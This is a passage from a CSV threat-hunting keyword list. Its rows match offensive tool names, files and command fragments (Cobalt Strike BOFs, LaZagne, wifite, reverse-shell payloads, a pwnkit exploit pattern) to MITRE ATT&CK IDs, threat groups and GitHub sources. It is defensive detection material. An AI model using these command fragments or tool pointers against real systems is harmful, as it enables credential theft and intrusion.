- T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*wh0amitz/BypassCredGuard*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*wh0amitz/S4UTomato*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*Wh1t3Fox/polenum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*WhatBreach*","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. 
To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","946","152","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z" +"*whatlicense-main.zip*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*whereami.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" 
+"*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*WheresMyImplant.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*WheresMyImplant.git*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*WheresMyImplant.sln*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*while * do mv *GCONV_PATH=./value* done","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034 ","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" +"*Whirlpool-Orig-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whirlpool-Tweak-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whisker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*whiskeysaml.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*whiskeysamlandfriends*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*whoami /user*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" 
+"*whoami*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*whoami.exe* /groups*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*whoami.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*whoami.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*WhoamiGetTokenInfo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*wifi/airpwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi/dnspwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi_dos_own.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*wifi_dos3.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*wifi_dump_linux*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*wifi_fake_auth.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*WiFi_Hacker.ino*","offensive_tool_keyword","Pateensy","payload for 
teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*wifi_pineapple_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*wifi_recon_handshakes*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*wifi-arsenal*","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1692","401","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" +"*wifibroot.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifidump.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3751","797","2023-07-04T01:43:51Z","2014-01-26T07:54:39Z" +"*wifiphisher*","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12111","2518","2023-09-26T19:58:05Z","2014-09-26T12:47:28Z" +"*WiFi-Pumpkin*","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","10","3059","750","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z" +"*wifite --crack*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --dict *.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wifite -e *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --kill*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wifite --wep *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*Wifite.py*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite2.git*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*win_chrome_password_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*win_fake_malware.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*win_keylogger.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*win_rev_http.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*win_rev_https.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*win_rev_tcp.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" 
+"*win_wlan_passwd_and_wanip_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*Win32.LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Win32.Trojan*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Win32/Goodkit*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32/IceId*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32/Mikatz*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","mimikatz signatures","10","10","N/A","N/A","N/A","N/A" +"*Win32/Trickbot*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32/UACBypass*","signature_keyword","Antivirus Signature","windows defender antivirus signature for UAC bypass","N/A","N/A","N/A","N/A","Defense 
Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32:Trojan*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*win32_stage_boot_reverse_shell_revert.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_uploadexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
